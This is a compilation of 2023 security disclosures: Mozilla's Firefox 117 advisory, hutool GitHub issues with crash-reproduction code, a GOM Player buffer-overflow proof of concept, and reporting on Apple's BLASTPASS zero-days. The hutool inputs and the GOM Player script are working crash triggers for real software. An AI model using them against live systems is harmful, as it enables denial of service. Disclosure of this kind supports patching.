When receiving rendering data over IPC `mStream` could have been destroyed when initialized, which could have led to a use-after-free causing a potentially exploitable crash. This vulnerability affects Firefox < 117, Firefox ESR < 102.15, Firefox ESR < 115.2, and Thunderbird < 115.2.

**Mozilla Foundation Security Advisory 2023-34**

Announced

August 29, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 117

**#CVE-2023-4573: Memory corruption in IPC CanvasTranslator**

Reporter

sonakkbi

Impact

high

**Description**

When receiving rendering data over IPC mStream could have been destroyed when initialized, which could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846687

**#CVE-2023-4574: Memory corruption in IPC ColorPickerShownCallback**

Reporter

sonakkbi

Impact

high

**Description**

When creating a callback over IPC for showing the Color Picker window, multiple of the same callbacks could have been created at a time and eventually all simultaneously destroyed as soon as one of the callbacks finished. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846688

**#CVE-2023-4575: Memory corruption in IPC FilePickerShownCallback**

Reporter

sonakkbi

Impact

high

**Description**

When creating a callback over IPC for showing the File Picker window, multiple of the same callbacks could have been created at a time and eventually all simultaneously destroyed as soon as one of the callbacks finished. This could have led to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1846689

**#CVE-2023-4576: Integer Overflow in RecordedSourceSurfaceCreation**

Reporter

fffvr

Impact

high

**Description**

On Windows, an integer overflow could occur in RecordedSourceSurfaceCreation which resulted in a heap buffer overflow potentially leaking sensitive data that could have led to a sandbox escape.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1846694

**#CVE-2023-4577: Memory corruption in JIT UpdateRegExpStatics**

Reporter

Lukas Bernhard

Impact

high

**Description**

When UpdateRegExpStatics attempted to access initialStringHeap it could already have been garbage collected prior to entering the function, which could potentially have led to an exploitable crash.

**References**

*   Bug 1847397

**#CVE-2023-4578: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception**

Reporter

Irvan Kurniawan (@sourc7)

Impact

moderate

**Description**

When calling JS::CheckRegExpSyntax a Syntax Error could have been set which would end in calling convertToRuntimeErrorAndClear. A path in the function could attempt to allocate memory when none is available which would have caused a newly created Out of Memory exception to be mishandled as a Syntax Error.

**References**

*   Bug 1839007

**#CVE-2023-4579: Persisted search terms were formatted as URLs**

Reporter

Malte Jürgens

Impact

moderate

**Description**

Search queries in the default search engine could appear to have been the currently navigated URL if the search query itself was a well formed URL. This could have led to a site spoofing another if it had been maliciously set as the default search engine.

**References**

*   Bug 1842766

**#CVE-2023-4580: Push notifications saved to disk unencrypted**

Reporter

Harveer Singh

Impact

moderate

**Description**

Push notifications stored on disk in private browsing mode were not being encrypted potentially allowing the leak of sensitive information.

**References**

*   Bug 1843046

**#CVE-2023-4581: XLL file extensions were downloadable without warnings**

Reporter

Umar Farooq (@Puf)

Impact

moderate

**Description**

Excel .xll add-in files did not have a blocklist entry in Firefox's executable blocklist which allowed them to be downloaded without any warning of their potential harm.

**References**

*   Bug 1843758

**#CVE-2023-4582: Buffer Overflow in WebGL glGetProgramiv**

Reporter

Dohyun Lee (@l33d0hyun) of SSD-Disclosure Labs & DNSLab, Korea Univ.

Impact

low

**Description**

Due to large allocation checks in Angle for glsl shaders being too lenient a buffer overflow could have occured when allocating too much private shader memory on mac OS.  
_This bug only affects Firefox on macOS. Other operating systems are unaffected._

**References**

*   Bug 1773874

**#CVE-2023-4583: Browsing Context potentially not cleared when closing Private Window**

Reporter

Thejaka Maldeniya

Impact

low

**Description**

When checking if the Browsing Context had been discarded in HttpBaseChannel, if the load group was not available then it was assumed to have already been discarded which was not always the case for private channels after the private session had ended.

**References**

*   Bug 1842030

**#CVE-2023-4584: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2**

Reporter

Randell Jesup, Andrew McCreight, the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 116, Firefox ESR 102.14, Firefox ESR 115.1, Thunderbird 102.14, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2

**#CVE-2023-4585: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2**

Reporter

Donal Meehan, Sebastian Hengst, and the Mozilla Fuzzing Team

Impact

high

**Description**

Memory safety bugs present in Firefox 116, Firefox ESR 115.1, and Thunderbird 115.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

CVE-2023-4573: Security Vulnerabilities fixed in Firefox 117

hutool v5.8.21 was discovered to contain a buffer overflow via the component `JSONUtil.parse()`.

**hutool Buffer Overflow vulnerability**

Moderate severity GitHub Reviewed Published Sep 9, 2023 to the GitHub Advisory Database • Updated Sep 11, 2023

GHSA-rr66-qh5m-w6mx: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonObject.putByPath`.

GHSA-7p8c-crfr-q93p: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonArray`.

GHSA-rxgf-r843-g53h: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component JSONUtil.parse().

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONUtil;

public class JSONOUtilTest {

    public static void main(String\[\] args) {
       String s = "{\\"G\\":00,\[,,\[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E5,6E962756779,4141697\],\]}";
        new JSONOUtilTest().testHutoolJSON(s);
        new JSONOUtilTest().testGson(s);
    }

       // hutool-json测试
        public void testHutoolJSON (String str) {
            JSON json = JSONUtil.parse(str);
        }

        // gson测试
        public void testGson (String str) {
            Gson gson = new GsonBuilder().setPrettyPrinting().create();
            JSONObject entries = gson.fromJson(str, JSONObject.class);
            System.out.println(entries.toStringPretty());
        }
}

2.  堆栈信息

我们的服务使用了hutool-json来将字符串解析为json，当我们接收到的字符串为"{\"G\":00,[,,[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E5,6E962756779,4141697],]}"时，JSONUtil.parse()挂起一段时间，然后服务崩溃，报错：

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3332)
    	at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
    	at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:649)
    	at java.lang.StringBuffer.append(StringBuffer.java:387)
    	at java.io.StringWriter.write(StringWriter.java:77)
    	at cn.hutool.json.serialize.JSONWriter.writeRaw(JSONWriter.java:392)
    	at cn.hutool.json.serialize.JSONWriter.writeValueDirect(JSONWriter.java:231)
    	at cn.hutool.json.serialize.JSONWriter.writeField(JSONWriter.java:196)
    	at cn.hutool.json.JSONArray.lambda$write$2cc9e97d$1(JSONArray.java:561)
    	at cn.hutool.json.JSONArray$$Lambda$6/379110473.accept(Unknown Source)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2690)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2674)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:561)
    	at cn.hutool.json.serialize.JSONWriter.writeObjValue(JSONWriter.java:257)
    	at cn.hutool.json.serialize.JSONWriter.writeValueDirect(JSONWriter.java:239)
    	at cn.hutool.json.serialize.JSONWriter.writeField(JSONWriter.java:196)
    	at cn.hutool.json.JSONArray.lambda$write$2cc9e97d$1(JSONArray.java:561)
    	at cn.hutool.json.JSONArray$$Lambda$6/379110473.accept(Unknown Source)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2690)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2674)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:561)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:543)
    	at cn.hutool.json.JSON.toJSONString(JSON.java:120)
    	at cn.hutool.json.JSONArray.toString(JSONArray.java:522)
    	at cn.hutool.json.JSONParser.parseTo(JSONParser.java:69)
    	at cn.hutool.json.ObjectMapper.mapFromTokener(ObjectMapper.java:243)
    	at cn.hutool.json.ObjectMapper.mapFromStr(ObjectMapper.java:219)
    	at cn.hutool.json.ObjectMapper.map(ObjectMapper.java:98)
    	at cn.hutool.json.JSONObject.<init>(JSONObject.java:210)
    	at cn.hutool.json.JSONObject.<init>(JSONObject.java:187)
    	at cn.hutool.json.JSONUtil.parseObj(JSONUtil.java:112)
    	at cn.hutool.json.JSONUtil.parse(JSONUtil.java:227)
    

经测试，我们发现，如果使用gson解析上述字符串，gson能够捕获异常：

    Exception in thread "main" com.google.gson.JsonSyntaxException: duplicate key: G
    	at com.google.gson.internal.bind.MapTypeAdapterFactory$Adapter.read(MapTypeAdapterFactory.java:190)
    	at com.google.gson.internal.bind.MapTypeAdapterFactory$Adapter.read(MapTypeAdapterFactory.java:145)
    	at com.google.gson.Gson.fromJson(Gson.java:932)
    	at com.google.gson.Gson.fromJson(Gson.java:897)
    	at com.google.gson.Gson.fromJson(Gson.java:846)
    	at com.google.gson.Gson.fromJson(Gson.java:817)
    	at JSONOUtilTest.testGson(JSONOUtilTest.java:43)
    	at JSONOUtilTest.main(JSONOUtilTest.java:54)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。
    
4.  分析
    

通过与gson运行结果的对比，JSONUtil.parse()方法解析特定输入时，会导致服务挂起和崩溃，存在安全隐患。

CVE-2023-42278: `JSONUtil.parse()`方法解析特定输入时，会导致服务挂起和崩溃，存在安全隐患 · Issue #3289 · dromara/hutool

hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonObject.putByPath.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONObject;

public class JSONObjectTest {

    public static void main(String\[\] args) {
        JSONObject jSONObject = new JSONObject();
        Object value = new Object();
        jSONObject.putByPath("...z.888888888", value);
    }
}

2.  堆栈信息

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3210)
    	at java.util.Arrays.copyOf(Arrays.java:3181)
    	at java.util.ArrayList.grow(ArrayList.java:267)
    	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    	at java.util.ArrayList.add(ArrayList.java:464)
    	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:435)
    	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:414)
    	at cn.hutool.core.bean.BeanUtil.setFieldValue(BeanUtil.java:312)
    	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:150)
    	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:115)
    	at cn.hutool.json.JSONObject.putByPath(JSONObject.java:325)
    	at JSONObjectTest.main(JSONObjectTest.java:39)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。

2 participants

CVE-2023-42277: `putByPath()`方法抛出OutOfMemory异常 · Issue #3285 · dromara/hutool

hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonArray.

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONObject;

public class JSONObjectTest {

    public static void main(String\[\] args) {
        JSONArray jSONArray = new JSONArray();
        Object element = new Object();
        jSONArray.add(1247626122, element);
    }
}

2.  堆栈信息

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3210)
    	at java.util.Arrays.copyOf(Arrays.java:3181)
    	at java.util.ArrayList.grow(ArrayList.java:267)
    	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    	at java.util.ArrayList.add(ArrayList.java:464)
    	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:461)
    	at JSONArrayFuzzerTest19.main(JSONArrayFuzzerTest19.java:37)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。
    
4.  分析
    

jsonArray.add(idx, [element)会在指定索引idx添加一个元素element。如果jsonArray长度小于指定索引，jsonArray.add()就会通过循环不断添加null，直到jsonArray的长度等于指定索引值。如果这个索引特别大，比如1247626122，就会报告一个OOM异常。

CVE-2023-42276: `JSONArray`的`add()`方法抛出OutOfMemory异常 · Issue #3286 · dromara/hutool

GOM Player version 2.3.90.5360 suffers from a buffer overflow vulnerability.

    # Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 30.08.2023# Vendor Homepage: https://www.gomlab.com# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE# Tested Version: 2.3.90.5360 (latest)# Tested on: Windows 11 64bit# Thanks to: M. Akil GÜNDOĞAN#  - Open GOM Player#  - Click on the gear icon above to open settings#  - From the menu that appears, select Audio#  - Click on Equalizer#  - Click on the plus sign to go to the "Add EQ preset" screen#  - Copy the contents of exploit.txt and paste it into the preset name box, then click OK#  - Crashed!#!/usr/bin/pythonexploit = 'A' * 260try:    file = open("exploit.txt","w")    file.write(exploit)    file.close()    print("POC is created")except:    print("POC is not created")

GOM Player 2.3.90.5360 Buffer Overflow

Apple on Thursday released emergency security updates for iOS, iPadOS, macOS, and watchOS to address two zero-day flaws that have been exploited in the wild to deliver NSO Group's Pegasus mercenary spyware.
The issues are described as below -

CVE-2023-41061 - A validation issue in Wallet that could result in arbitrary code execution when handling a maliciously crafted attachment.
CVE-2023-41064

Apple on Thursday released emergency security updates for iOS, iPadOS, macOS, and watchOS to address two zero-day flaws that have been exploited in the wild to deliver NSO Group's Pegasus mercenary spyware.

The issues are described as below -

*   **CVE-2023-41061** - A validation issue in Wallet that could result in arbitrary code execution when handling a maliciously crafted attachment.
*   **CVE-2023-41064** - A buffer overflow issue in the Image I/O component that could result in arbitrary code execution when processing a maliciously crafted image.

While CVE-2023-41064 was found by the Citizen Lab at the University of Torontoʼs Munk School, CVE-2023-41061 was discovered internally by Apple, with "assistance" from the Citizen Lab.

The updates are available for the following devices and operating systems -

*   **iOS 16.6.1 and iPadOS 16.6.1** - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
*   **macOS Ventura 13.5.2** - macOS devices running macOS Ventura
*   **watchOS 9.6.2** - Apple Watch Series 4 and later

In a separate alert, Citizen Lab revealed that the twin flaws have been weaponized as part of a zero-click iMessage exploit chain named BLASTPASS to deploy Pegasus on fully-patched iPhones running iOS 16.6.

"The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim," the interdisciplinary laboratory said. "The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim."

Additional technical specifics about the shortcomings have been withheld in light of active exploitation. That said, the exploit is said to bypass the BlastDoor sandbox framework set up by Apple to mitigate zero-click attacks.

"This latest find shows once again that civil society is targeted by highly sophisticated exploits and mercenary spyware," Citizen Lab said, adding the issues were found last week when examining the device of an unidentified individual employed by a Washington D.C.-based civil society organization with international offices.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

Cupertino has so far fixed a total of 13 zero-day bugs in its software since the start of the year. The latest updates also arrive more than a month after the company shipped fixes for an actively exploited kernel flaw (CVE-2023-38606).

News of the zero-days comes as the Chinese government is believed to have ordered a ban prohibiting central and state government officials from using iPhones and other foreign-branded devices for work in an attempt to reduce reliance on overseas technology and amid an escalating Sino-U.S. trade war.

"The real reason \[for the ban\] is: cybersecurity (surprise surprise)," Zuk Avraham, security researcher and founder of Zimperium, said in a post on X. "iPhones have an image of being the most secure phone... but in reality, iPhones are not safe at all against simple espionage."

"Don't believe me? Just look at the number of 0-clicks commercial companies like NSO had over the years to understand that there is almost nothing an individual, an organization, or a government can do to protect itself against cyber espionage via iPhones."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Rushes to Patch Zero-Day Flaws Exploited for Pegasus Spyware on iPhones

A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.5.2, iOS 16.6.1 and iPadOS 16.6.1. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

This document describes the security content of macOS Ventura 13.5.2.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**macOS Ventura 13.5.2**

Released September 7, 2023

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk School

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: September 07, 2023

Tag

#buffer_overflow